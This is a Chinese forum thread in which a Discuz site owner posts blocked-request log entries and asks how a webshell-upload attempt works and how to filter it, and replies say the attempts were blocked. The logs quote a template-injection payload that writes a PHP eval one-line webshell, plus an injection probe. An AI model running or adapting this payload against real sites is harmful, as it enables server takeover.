论坛被上传一句话木马函数eval-1719

逝水年华 · 发表于 2020-8-20 08:54:48

马上注册，免费下载更多dz插件网资源。

您需要登录才可以下载或查看，没有账号？立即注册

×

十月份
<?PHP exit;?> 1572107794 您当前的访问请求当中含有非法字符，已经被系统拒绝 PHP:home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e User: uid=0; IP=31.210.88.178; RIP:157.119.232.12 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572108553 您当前的访问请求当中含有非法字符，已经被系统拒绝 PHP:home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 0a040e74e3b12d6c7c171c7bea2df37e User: uid=0; IP=103.130.218.108; RIP:157.119.232.9 Request: /home.php?ac=plugin'&id=saya_card:card'"&mod=spacecp'&op=credit'
<?PHP exit;?> 1572551909 您当前的访问请求当中含有非法字符，已经被系统拒绝 PHP:index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 User: uid=0; IP=94.191.15.67; RIP:123.151.76.253 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
十一月份
<?PHP exit;?> 1572630519 您当前的访问请求当中含有非法字符，已经被系统拒绝 PHP:index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024 e86a1b6a3998a55766370723968ce392 User: uid=0; IP=94.191.15.67; RIP:183.3.254.82 Request: /?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>

这两天连续被人用同一种方法挂马了两次，虽然有用安全软件，没修复的话总感觉心里不踏实。
有没有大佬能看懂是如何挂马的？怎么修复？使用安全软件的Nginx防火墙的话怎么添加规则内容？是否都需要在过滤中添加？
问题有点多，再次拜谢大佬们了
论坛被上传一句话木马函数eval-1719 论坛,上传,一句话,木马,函数

©DZ插件网所发布的一切资源仅限用于学习和研究目的；不得将上述内容用于商业或者非法用途，否则，一切后果请用户自负。
网站部分内容来源于网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑中彻底删除上述内容。如果您喜欢该程序，请支持正版软件，得到更好的正版服务。
您在本站任何的赞助购买、下载、查阅、回复等行为等均表示接受并同意签订《DZ插件网免责声明协议》。
如有侵权请邮件与我们联系处理: discuzaddons@vip.qq.com 并出示相关证明以便删除。敬请谅解！

TyCoding · 发表于 2020-8-20 08:54:55

木马问题不是在程序本身，而是服务器的权限，是某种的木马伪装成图片通过上传头像帖子等方式就上传到你服务器上了，要命的是你服务器还允许执行，
单纯的清理木马没用的要服务器的安全最主要
您可以加我QQ129820交谈，有偿服务，专业清理+安防

如果在日志里，可以无视的

Crystαl · 发表于 2020-8-20 08:55:27

dz日志里面是已经拦截的所以没传成功哦

拾光 · 发表于 2020-8-20 08:55:38

被误拦截了, 你现在要做的就是关闭第三方安全软件, 否则论坛正常功能会被破坏

IT618发布 · 发表于 2020-8-20 08:56:05

安全狗报毒了

Crystαl · 发表于 2020-8-20 08:56:11

扯淡？？？？？

Crystαl · 发表于 2020-8-20 08:56:24

这就是别人一个尝试。然后记录了写入到了log里面。带某些特征字段
一般都不用理会

不信你自己复制那段字段加在自己域名后面浏览器访问一次。一样报错记录在后台然后写入了log日志。
然后就安全狗报警了其实没什么用

浅生 · 发表于 2020-8-20 08:57:05

安全狗报毒是log文件吧如果是那只是关键字触发防护规则哦

浅生 · 发表于 2020-8-20 08:57:11

如果别人可以通过这种关键字符访问方式就能注入成功的话, 那是程序代码自身有了严重漏洞, 应该从修复漏洞代码入手, 据我所知DZ目前没有这种漏洞,

如果你安装一些第三方拦截软件的话, 它会不管三七二十一只要内容你有一些关键词字符就给别人误拦截访问了,
这样你的论坛很多正常功能也就被破坏了, 这种拦截行为自身和恶意程序又有何区别呢?